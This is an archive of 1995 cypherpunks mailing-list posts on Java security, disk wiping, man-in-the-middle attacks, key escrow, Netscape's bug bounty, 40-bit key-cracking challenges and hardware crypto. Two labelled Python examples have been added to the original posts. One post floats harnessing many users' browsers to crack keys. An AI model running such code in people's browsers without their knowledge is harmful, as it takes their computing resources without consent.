> From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
> To: cypherpunks@toad.com, bugtraq@crimelab.com
> Cc: gauthier@cs.Berkeley.EDU, brewer@cs.Berkeley.EDU, iang@cs.Berkeley.EDU,
>         daw@cs.Berkeley.EDU, fur@netscape.com
> Subject: Basic Flaws in Internet Security and Commerce
> Date: Mon, 09 Oct 1995 14:26:06 -0700
> Sender: owner-cypherpunks@toad.com
> Content-Length: 10235
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 07:47:09 PDT
To: adam@homeport.org (Adam Shostack)
Subject: Re: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <199510101415.KAA03219@homeport.org>
Message-ID: <9510101444.AA04563@all.net>
MIME-Version: 1.0
Content-Type: text


...
> 	I'd be real interested in seeing an MTA proven secure.  Smail
> or Zmailer perhaps?

The problem is that such programs were not designed to be secure (as far
as I am aware) or to be proven secure, and thus, even with lots of
computing power, there is essentially no hope of doing this.  In fact,
they are almost certainly not secure (as these proofs generally help detect).

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Tue, 10 Oct 95 07:39:54 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: PC disk wipe software
In-Reply-To: <199510100721.AAA20944@ix.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951010104538.255B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Bill Stewart wrote:

> >There has been considerable discussion on the MCIP list about how most
> >*Mac* programs that purport to do this, like Burn, for example, leave stuff
> >over in disk blocks. My understanding is that this is not a trivial
> >problem, and it occurs in MUSH-DOS as well....
> 
> Doing it _right_ is not a trivial job.  Consider disk controllers that
> map out bad blocks so the OS never needs to see them - if you're trying
> to remove highly classified data, the fact that Diskwipe won't ever see them
> might be a serious problem, even if it is close enough for government work.

FYI the Justice Department requires degaussing a hard drive before it can 
be declared surplus ...

EBD


<deletia>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 10 Oct 95 07:57:36 PDT
To: cypherpunks@toad.com
Subject: Java=?
Message-ID: <9510101456.AA24338@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Being a newcomer to this list, and having read a lot of java-related messages 
without understanding them fully, could someone explain to me exactly what 
java *is*?  Thanks for your time, ahead of time.

DMiskell@envirolink.org

---
_________________________________
*!Cheese Doctrine:!*
     Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________

"Oh $HI+, here comes a flock of pushers - 'Jungle Edition.'"
-Mortifer Nex, playing peek-a-boo in the trees

"If you've got the coordinance, we've got the ordinance to blow up the
 loved ones who blow you off!"
-Uncle Dan's Thermonuclear Explosives, Unlimited





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Oct 95 08:01:17 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: java security concerns
In-Reply-To: <9510101301.AA28597@alpha>
Message-ID: <199510101500.LAA02245@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
>  > I can
>  > physically remove all the "dangerous" calls from a Postscript
>  > interpreter and still have it be useful.
> 
> I don't see the difference.  An interpreter is an interpreter.

I suppose most of this is dead obvious to me because I work in
security every day, but it seems that some otherwise smart people don't
see the point I'm making, repeatedly.

As an exercise to the reader compare the following two tasks in
difficulty.

1) Find a bug that lets you execute arbitrary programs unintentionally
   from a program that contains instances of the 'fork()' system call.

2) Find a bug that lets you execute arbitrary programs unintentionally
   from a  program that contains *no* instances of the 'fork()' system call.

[hint: it is much harder to get a program to do something that it has
no code at all to do than to get it to do a buggy form of a something
it already does.]

Perry
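The comparison posed in the message above, as an added example that is not part of the original post. It uses a toy PostScript-like stack interpreter built two ways: one keeps a `run` operator behind a safe-mode guard, the other has no such operator at all. The interpreter, the operator names and the case-handling flaw in the guard are all constructed for illustration, and `run` only records its argument rather than executing anything.

```python
class Blocked(Exception):
    """Raised when the safe-mode guard refuses an operator."""


class UnknownOperator(Exception):
    """Raised when the interpreter has no code for an operator."""


def make_interpreter(include_dangerous: bool, safe_mode: bool = True):
    """Build a toy interpreter; returns (execute, launched).

    `launched` records what the dangerous operator was asked to start.
    Nothing is ever executed; the list only makes the effect observable.
    """
    launched = []

    def op_add(stack):
        b, a = stack.pop(), stack.pop()
        stack.append(a + b)

    def op_mul(stack):
        b, a = stack.pop(), stack.pop()
        stack.append(a * b)

    def op_dup(stack):
        stack.append(stack[-1])

    def op_run(stack):
        launched.append(stack.pop())

    ops = {"add": op_add, "mul": op_mul, "dup": op_dup}
    if include_dangerous:
        ops["run"] = op_run  # the code exists; only the guard stands in the way

    def execute(program: str):
        stack = []
        for token in program.split():
            if token.startswith("/"):          # /name pushes a literal
                stack.append(token[1:])
                continue
            try:
                stack.append(int(token))
                continue
            except ValueError:
                pass
            # Constructed flaw: the guard compares the raw token, while
            # dispatch below lowercases it first.
            if safe_mode and token == "run":
                raise Blocked(token)
            name = token.lower()
            if name not in ops:
                raise UnknownOperator(token)
            ops[name](stack)
        return stack

    return execute, launched


def outcome(include_dangerous: bool, program: str):
    """Run program in safe mode; return (result_or_error_name, launched)."""
    execute, launched = make_interpreter(include_dangerous, safe_mode=True)
    try:
        result = execute(program)
    except (Blocked, UnknownOperator) as exc:
        result = type(exc).__name__
    return result, launched


if __name__ == "__main__":
    for program in ("2 3 add dup mul", "/some-program run", "/some-program RUN"):
        print(program)
        print("  guarded build :", outcome(True, program))
        print("  stripped build:", outcome(False, program))
```

Both builds stay useful for arithmetic, but a single flaw in the guard is enough to reach `run` in the guarded build, while the same input in the stripped build has nothing to reach.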




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 08:06:59 PDT
To: cypherpunks@toad.com
Subject: William S. Powell in front of Congress Oct 11, 10:30 AM
Message-ID: <9510101504.AA05512@all.net>
MIME-Version: 1.0
Content-Type: text


William S.  Powell is the person who first patented an electronic money
system (almost 15 years ago now), and he will be testifying before the
congressional subcommittee tomorrow - Oct.  11, 1995 at 10:30 AM
(scheduled).  If you really want to know about electronic cash and how
our society has treated it over the last 15 years, you might want to
watch this.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 08:11:25 PDT
To: cypherpunks@toad.com
Subject: Myth of the Powerless State
Message-ID: <199510101509.LAA16131@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Gentlemen:

Your leader entitled "The myth of the powerless state" (October 7th) made some valuable points about the continuing significance of state power in our lives but missed some very significant numbers.  

You state that public spending in the "big economies" has expanded from 36% to 40% of GDP since 1980.  But, if you take the world's economy as a whole, can you doubt that the percentage of Gross World Product (GWP) controlled by the world's states has declined since 1980?

Note the following significant changes.  1)  In both developed and underdeveloped countries, the "informal sector" has continued to grow.  You, yourself have reported that the poorest households in America spend twice their official income.  2)  The Soviet Union has gone from an almost 100% government-controlled economy to one which has a much smaller state sector.  Meanwhile informal and formal privatization in China, India, Britain, etc. have transferred vast assets to private control.  3)  The continued accumulation of offshore funds are effectively outside of the game and under no flag.  The amount of these funds is hard to estimate but has surely grown quite large.

The convergence of all of these factors suggests that, at some point in the late '80s or early '90s, the percentage of the GWP controlled by governments peaked and began to decline.  

As technology makes it easier for the financial services industry to carve its niches in the corridors of cyberspace, stateless financial assets seem sure to grow.  Since anyone can use powerful mathematics to create virtual spaces which even the largest government is powerless to enter, the percentage of GWP that the state even knows about much less controls will shrink.

Duncan Frissell 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Tue, 10 Oct 95 08:12:05 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: rise and fall...
Message-ID: <Pine.SUN.3.91.951010111036.434A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain





Some time ago on the list someone mentioned a book "Rise and Fall of the 
Nation State."

Can someone confirm author/title information for me?


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 08:14:28 PDT
To: cypherpunks@toad.com
Subject: My Last Message
Message-ID: <199510101513.LAA16827@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Oops!  My last message was a letter to the editor of the Economist.  I
forgot to mention that.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 11:28:55 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
Message-ID: <199510101828.LAA17871@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 AM 10/10/95 -0700, Hal wrote:
>Still, there is a problem here: how did the bank know that it _should_
>honor requests to withdraw money from bank account x if they are signed
>with a certain key?  How did it determine that that is a valid key, if it
>never had a secure channel to the person opening the account?  I think
>the answer is clearly that it cannot, that it must have had a secure
>channel.  Would a certificated key presented by Alice have been
>sufficient to create such a channel, do you think, or would a face to
>face meeting have been necessary?  (Or would an uncertificated key be
>adequate?)

I think you're probably right, though a one-way secure channel is enough.
If Alice has a trusted copy of the Bank's key, she can open her account and 
get her key certified by them without them having to trust her key (modulo 
little details like government requirements that banks get positive 
identification for their accountholders.)


>What if you are accessing the bank via a MITM?  Consider this example:
>Alice writes you a check, signed with a key (without her name) which
>has a credential from the bank saying that it will back up the check.
>But you need the bank's key to check the credential, so Alice gives it
>to you, or you get it from a public cache.  Suppose the bank's key is
>fake, and Alice is defrauding you.  How do you tell?  

With online clearing, you'd be able to tell because Alice's check cleared
and your bank (which we're assuming you've got a secure channel to)
says you've got the money.  Or in the case of digicash, because the cash
Alice's bank gave you was good.

>Wouldn't a certificate on the bank's key be necessary, one which ties the
>bank's name and reputation to the key?

Maybe not, but it would sure help.

>Or what if the bank really is and has always been behind a MITM?  You say
>that it is more profitable for the bank not to abscond with your money.
>What about the MITM?  He doesn't make any profits until he cheats.  

Hmmm.  That one's interesting; he pays fakes everything for a while,
including paying out money, and then pulls off the Big Con.

>It seems to me that a lot of protocols assume the existence of secure
>channels.  Yet the MITM attack shows that public key cryptography does
>not in and of itself provide a secure channel.  This is a problem which
>IMO should not be ignored simply because it is inconvenient.

Agreed.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 11:28:39 PDT
To: Mike Fletcher <fletch@ain.bls.com>
Subject: Re: Java idea
Message-ID: <199510101828.LAA17877@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 10/10/95 -0400, Mike Fletcher <fletch@ain.bls.com> wrote:
>
>Well, security bugs aside (and I've got the sun4.1.3_u1 and Win32 ns2b
>distributions :) has anyone given any thought to using Java to do some
>sort of Chinese Lottery attack.  I was re-reading App. Crypto. last
>night and it could be feasible.  If you could get your key cruncher
>thread loaded into a good many browsers to run when idle . . . .  How
>many estimated copies of NS are there?  Anyone want to do the math? :)

Yeah, this was discussed; mix it in with a cool screen saver 
        "We're busy hacking Microsoft!" bouncing around the screen
and you could probably get a lot of people to try it, assuming of course
that it can run in offline mode conveniently, which I'm not sure
Netscape can yet (downloading the software, copying mozock/nullsock as
winsock, and restarting Netscape doesn't strike me as convenient,
which means it's also not an off-line mail/news reader yet.)

The negative part is that Java Bytecode interpretation is about 10x slower
than native code; you'd have to get people to download native libraries
for their platform to do the grunt work.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Tue, 10 Oct 95 08:35:09 PDT
To: cypherpunks@toad.com
Subject: truth in advertising: Netscape 1.1 on security
Message-ID: <199510101534.LAA22081@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Tue Oct 10 11:34:39 1995

This may be old news, but I don't recall seeing it on the list...

In version

		netscape -version

		Netscape 1.1N/export, 20-Apr-95; (c) 1995 Netscape Communications Corp.

I ran 'strings' on the binary, and only got one "about.*security" reference.

entering it as an URL
		
		about:security

yields the ironically humorous (when you consider all of the security bugs):

		Whatchew talkin' 'bout, Willis?

- -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	  PGP encrypted mail preferred.   Ask me about gnuslive.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Tue, 10 Oct 95 10:24:28 PDT
To: cypherpunks@toad.com
Subject: Baltimore security conference, opening session
Message-ID: <9510101723.AA09997@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I attended the opening session of the National Computer Security
Conference this morning.  Actually it's been renamed to "Info systems
something-or-other", but I don't recall what.

The opening session is NIST's opportunity to take center stage, which
they did.  

The most interesting information to come out of the session was that
the govt is still pushing very hard for key escrow.  Most of the
speakers mentioned key escrow, and talked about the need for business
and govt to compromise to meet the needs of law enforcement blah blah
blah.

The "distinguished awardee" is Dennis Branstad, his speech was read by
Steven Walker.  In it, Branstad claimed that key escrow is a great
gift being provided by the government to the private sector, and that
companies want it a lot.

Stuart Katzke from NIST said that "our" goal (where "our" is
computer security professionals) is to deploy secure systems, but he
believes that "we" often lose sight of that goal.  Said that govt and
industry need to find compromises so that both can meet their goals
and get systems deployed.  I believe he mentioned export laws and key
escrow as areas for potential "compromises", but am not certain; if
not stated it was implied.  My interpretation is that he claims
those who object to key escrow are getting in the way of deploying
secure systems.

Someone, I don't recall who, pointed to the european "interest" in key
escrow, saying other govts might not allow systems to be deployed
without key escrow, thus key escrow was a good thing.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 10 Oct 95 13:43:34 PDT
To: cypherpunks@toad.com
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510101920.PAA24628@panix.com>
Message-ID: <199510102043.NAA06895@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Duncan Frissell <frissell@panix.com> writes:
> Any movement towards a third cracking session.  I know poor Netscape seems
> like old hat but it might be good to do one more to establish a working
> server (if we have one).

I'd rather see a Microsoft challenge than a third Netscape 40-bitter.
We've made our point about 40-bit keys on Netscape's skull enough times,
and Microsoft is making smug product announcements referring to those
Netscape breaks.

Time to spread our joy around a bit, I'd say.

	Jim Gillogly
	Hevensday, 19 Winterfilth S.R. 1995, 20:42




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 10 Oct 95 11:10:39 PDT
To: owner-cypherpunks@toad.com
Subject: Re: java security concerns
Message-ID: <9510101808.AA25419@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> >By the way, I suggest that Sun should offer a large money prize for
>> >the first significant security hole found the Java implementation. Its
>> >a tiny price to pay for security.

I notice that netscape just announced that they're doing this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 10 Oct 95 06:13:39 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <3046.9510101409@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hal <hfinney@shell.portal.com> writes:
>The POV I am really arguing against is the one that defines identity to
>be a key, that states that in communicating with a key you are by
>definition communicating with the person you have in mind.  The man in
>the middle attack does not exist because from your point of view the
>entity at the other end of the communication channel is just the MITM
>plus the person you think you are talking to.  This idea has been
>expressed many times by other people in this discussion, and it is this
>which I think is fundamentally flawed and even dangerous because it
>encourages the use of untested keys.  In fact it seems to define away
>the question of whether a key is real or fake.

It defines away the question of whether a key is real or fake because
the key itself can not be fake. Assuming strong encryption anything that
you send to the key can only be read by the key and anyone that he/she
chooses to pass it on to (something that can not be stopped).

The only thing that can be fake about the key is the attributes
associated with it - whether the attributes concerned are true names
or the ability to use a bank account. Having a man in the middle when
no attributes are concerned is simply the same as talking to someone
who passes all of your messages on to a friend and then expresses
the friend's opinion rather than his/her own back to you... something
that I can think of no possible way to stop. So although you are
talking to A the opinions expressed are those of B, and there
is no way of telling - in the same way as a man in the middle attack
(B may not even know that his/her arguments are being used by A
against you).

This argument reduces the problem to 'how do you validate key
attributes' as you can be sure that you are communicating securely
with the key (key's owner) but nothing else. With PGP currently the
only attribute that a key (X) may have is a name (true/pseudo) and
this attribute can be signed as valid by another key (Z). If you
accept the signature all you are doing is saying that you accept
the signing key's certification - ie an attribute signed by this
key (Z) is true. Eventually you have to just trust a key to have
taken reasonable care to ensure that any attribute that it has
signed is true - whether you are using a Web of Trust model or a
more centralised model such as accepting VeriSign certificates (or
your own - knowing exactly how much care you have taken to ensure
that the attribute that you have certified (signed) is true).


I believe that this is more removing a special case (treating the
true name differently from any other attribute) than defining away
the problem - even though the (MITM) problem does cease to exist.

Jon
jbaber@mi.leeds.ac.uk
http://www.chem.surrey.ac.uk/~ch02jb/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 12:22:51 PDT
To: cypherpunks@toad.com
Subject: Hal's Third Challenge?
Message-ID: <199510101920.PAA24628@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Any movement towards a third cracking session.  I know poor Netscape seems
like old hat but it might be good to do one more to establish a working
server (if we have one).

My interest arises out of the new Pentium 120 that has come my way and the
40,000 keys/second it gets running the 32-bit version of the Brue code.
Since my ISP is a local call, I might even be able to get away with an 8
hour PPP session to try the WIN95 client.

What's going on?

DCF

"Take your Writ of Ne Exeat Republica and shove it." --- words to keep
around to really impress the opposition with.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 10 Oct 95 08:01:36 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510101258.AA28275@alpha>
Message-ID: <24567.9510101425@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally <m5@dev.tivoli.com> writes:
>Don M. Kitchen writes:
> > >  If we are forced to exchange keys remotely, then perhaps some sort of
> > >  "proof" techniques could be used to establish to some level of
> > >  assurance that the remote entity I *think* is you is really you.  Or
> > 
> > So who is Pr0duct Cypher then? And why should I have to produce ID saying 
> > my name is Don, unless I'm proving my Real Name[tm] is Don.
>
> Right.  If we're forced to exchange keys remotely, I just have to deal
> with the possibility that I'm being spoofed.

You could take out a personal ad in a newspaper and print this:

	9D AF 6D 4D 8E 64 43 FC  D5 CB 9C 7A 36 C7 6D B9

(Pr0duct Cypher's key fingerprint).

That would mean that you could at least help Pr0duct Cypher determine
if there was a man in the middle.  If there was a MITM, once Pr0duct
was aware of this, P.C. could make efforts to change service provider,
or find novel entry points into public internet forums, and different
entry points in to the remailer net.

For the other direction, as a nym, if newspapers accepted anonymous
personal ads, an ad posted from a large city postal mail to the
newspaper, would be a reasonable assurance that the identity of the
person would be unknown.  Or you could try paper mailing someone your
instructions with cash to pay for the advert.  It is likely that a
randomly picked cypherpunk would do this for a nym.

You could even take out two simultaneous ads in two independent
newspapers which were secret split in two with XOR and a random
number, if you were really paranoid.

Now the MITM is reduced to denial of service attacks, by posting
similar keys, and saying "no that nym is an imposter I'm the real nym".
Denial of service is preferable to a MITM.

Adam
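
Added example (not part of Adam's message): the two-newspaper XOR split described above, applied to the fingerprint quoted in the message. The function names and the n-way generalization are assumptions of this sketch; each printed share is a uniformly random string on its own, so a reader needs every ad to rebuild the fingerprint.

```python
import secrets

# Fingerprint as printed in the message above (16 bytes).
FINGERPRINT = "9D AF 6D 4D 8E 64 43 FC  D5 CB 9C 7A 36 C7 6D B9"


def parse_hex(text):
    """Parse a printed fingerprint or share ('9D AF ...') into bytes."""
    return bytes.fromhex("".join(text.split()))


def format_hex(data):
    """Print bytes as hex pairs with a wider gap in the middle, as above."""
    pairs = [f"{b:02X}" for b in data]
    half = len(pairs) // 2
    return " ".join(pairs[:half]) + "  " + " ".join(pairs[half:])


def xor_bytes(a, b):
    if len(a) != len(b):
        raise ValueError("shares must all have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def split_for_ads(fingerprint_text, n=2):
    """Return n printable shares: n-1 random pads plus secret XOR all pads.

    Any n-1 shares are statistically independent of the fingerprint, so an
    interceptor who can alter only one newspaper learns and controls nothing.
    """
    if n < 2:
        raise ValueError("need at least two shares")
    secret = parse_hex(fingerprint_text)
    pads = [secrets.token_bytes(len(secret)) for _ in range(n - 1)]
    last = secret
    for pad in pads:
        last = xor_bytes(last, pad)
    return [format_hex(share) for share in pads + [last]]


def recover_from_ads(ad_texts):
    """XOR every printed share together to get the fingerprint back."""
    shares = [parse_hex(text) for text in ad_texts]
    out = bytes(len(shares[0]))
    for share in shares:
        out = xor_bytes(out, share)
    return format_hex(out)
```

A share altered in either newspaper changes the recombined value, so the reader's comparison against the key they actually hold fails rather than silently accepting a substituted fingerprint.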





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: benny@SIRIUS.COM (Thomas Gorman)
Date: Tue, 10 Oct 95 16:30:46 PDT
To: cypherpunks@toad.com
Subject: Netscape Crack
Message-ID: <v01510100aca0532f278c@[204.188.105.52]>
MIME-Version: 1.0
Content-Type: text/plain


Hey-

I'm a bit new to the Crypto Field but I know enough.  I heard that the
Cypherpunks ran a brute force attack on Netscape's 40-Bit code but I still
don't know how those two guys in Berkeley broke the 40-bit in just a few
minutes.  Can someone on this list explain it to me?  Thanks.

--tom gorman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Oct 95 08:50:32 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510101550.QAA29289@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by bdavis@dg.thepoint.net (Brian Davis) on 
Tue, 10 Oct 10:47 AM


>FYI the Justice Department requires degaussing a hard 
>drive before it can be declared surplus ...

-----

The Washington Post, Oct 9, 1995.

E-Mail That Comes Back And Bites. Even Deleted Messages
Can Be Recovered for Court [excerpts]


Computer sleuth John Jessen dredges computer files for
electronic embarrassments that their authors thought were
long gone. "Deleted" e-mail messages can pile up like
little time bombs until someone such as Jessen arrives,
carrying a court order and a stack of blank memory
cartridges.

"Can you really delete e-mail?  Sure," Jessen said. "Does
it happen as a common practice? No."

Jessen is the founder of Electronic Evidence Discovery
Inc., a Seattle company that since 1987 has been going
after computer evidence in civil lawsuits. The nation's
25 million to 40 million users of e-mail are growing more
comfortable with the medium. And more attorneys are
recognizing e-mail's potential as a source of unguarded
information about the companies they're suing.

"People are very candid talking around the coffee
machine," attorney Michael Patrick of Palo Alto, Calif.,
said. "They seem to behave the same way on the computer
system.

"They think they're speaking confidentially, so they're
off the cuff," he said. "They're very often insulting.
What they don't realize is it's all being recorded, and
often those recordings are stored for a very long time.
When you send a message, you lose control over where it
goes."

Many workers think their e-mail is private. It's not.
Federal law allows employers to monitor employees'
e-mail, and even if they don't, e-mail is fair game in
lawsuits. When someone sues a company, the rules of
discovery demand that the company produce all relevant
business records.

"The fact that they live in a computer rather than a file
cabinet doesn't make any difference to the court," said
Joan Feldman at Computer Forensics, another Seattle firm
that specializes in this work.

Often files retrieved include e-mail thought to have been
erased long ago. It survives because the diligent
computer system manager makes backup tapes of everything
on the system every night, then stores those tapes for
years.

And so the files persist and multiply, aided by
technological advances that continually add more storage
capacity, more automatic backups and more redundancies to
safeguard data from accidental erasure.

"The computer is like a file cabinet that can open its
own drawer, put a file on the copy machine and then slip
the copy into another cabinet," Jessen said. "Sometimes
I think it's alive."

Jessen and Feldman augment their high-tech detective work
by advising companies how to become less vulnerable to
computer snoops like themselves: They recommend regular
purges of old data, and they offer tips for avoiding
e-mail blunders in the first place. Rule No. 1: Don't put
anything on e-mail that you wouldn't want a jury to see.

-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 10 Oct 95 13:58:46 PDT
To: cypherpunks@toad.com
Subject: Netscape starts their own "Hack Netscape" contest
Message-ID: <199510102058.QAA17999@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Starting today, Netscape is awarding those who are first to find
security bugs in Netscape 2.0 with cash prizes. (see their
homepage for more info)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Tue, 10 Oct 95 10:14:09 PDT
To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Subject: Re: java security concerns
In-Reply-To: <9510100030.AA29195@pepper.Eng.Sun.COM>
Message-ID: <199510101714.KAA07329@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 09 Oct 1995 17:30:38 -0700, cmcmanis@scndprsn.Eng.Sun.COM
(Chuck McManis) wrote:

> >By the way, I suggest that Sun should offer a large money prize for
> >the first significant security hole found the Java implementation. Its
> >a tiny price to pay for security.
> 
> I don't think the lawyers would let us. 

Pardon my French, but if your lawyers make it impossible to do
technical work correctly, isn't it time to get new lawyers?  I can't
see how offering a reward for reporting bugs could possibly be
objectionable to any rational lawyer.

This can be a VERY useful (and very inexpensive) debugging technique.
Didn't Knuth offer a cash reward to the first person to find each typo
in his "Fundamental Algorithms" series -- and then doubled the amount
each year?

It can also be a very useful teaching tool, in that it encourages
users to explore little-used corners of a system.

I applaud any company that has the guts to do it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 17:26:34 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
In-Reply-To: <9510102227.AA05494@usonian.itd.nrl.navy.mil.>
Message-ID: <199510110025.RAA10439@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael G. Reed <reed@itd.nrl.navy.mil> writes:

>All-
>	I remember there was some talk about Netscape adding Fortessa support
>on here a couple of days ago, so I thought I'd share this.  Marc Andreessen
>(president of technology for Netscape Communications) made a presentation
>today at the 18th National Information Systems Security Conference about
>Fortessa support within Netscape 2.0 to be shipping Beta Q2 '96 and final
>the second half of '96 (I haven't seen an official press release, but he more
>or less said they were announcing it today).  From his description, it looks
>like they are going to place the Fortessa drivers right in the SSL layer
>bypassing the software subsystem that currently exists in favor of the
>hardware (the software subsystem would still be utilized for non-Fortessa
>sessions).  He also commented that this was possibly a lead-in to other
>hardware subsystems in the future.  General reaction (at least in my
>immediate vicinity in the lecture hall) was quite positive -- looks like
>Fortessa is gaining even more momentum (Oracle had a talk about Fortessa
>support immediately after Netscape).  I wonder when Microsoft & company will
>jump on the bandwagon? :-)

There seems to be a convergence on this approach to a hardware
solution.  HP has been pushing for a model in which software with hooks
for hardware encryption will be allowed to get exported.  Then you can
plug in whatever level of encryption you are able to have in the
form of a card token.  Traditionally NSA has opposed export of software
with hooks but there are some indications that this method could be
accepted eventually.

Conceivably we could get to a situation where most encryption is done in
hardware, with the big, ubiquitous software packages like Netscape and
Word and their descendants just having hooks.  This would have some
advantages but overall I think it would be detrimental to cypherpunk
goals.  One of the biggest problems faced by those who want to restrict
access to encryption is how easy it is to do.  PGP and other programs are
virtually impossible to control.  They are easy to write and people can
spread them around trivially.

But hardware is not so simple.  If the only effective way to get
convenient communications with your net access software became to use a
hardware token, then it would be a lot easier to put on restrictions.  An
underground effort to manufacture and distribute tokens would be much
less practical than one to do the same thing for secure software.

I would like to see companies which add hooks for hardware also begin
adding hooks for software packages as well, at least in their domestic
versions.  In the case of Windows, for example, a DLL interface to
provide encryption functions should not be hard to add using a similar
API as for the hardware crypto card.  Similar interfaces should be
possible on other OS's.  Companies which do this will demonstrate their
commitment to making good quality cryptography available to their
customers.  A system which is "open" only to the extent that a hardware
card can be added is not sufficient.  A truly open system will allow
software add-ons as well.  Let's keep an eye on how this develops and let
the companies know how we feel.

Hal




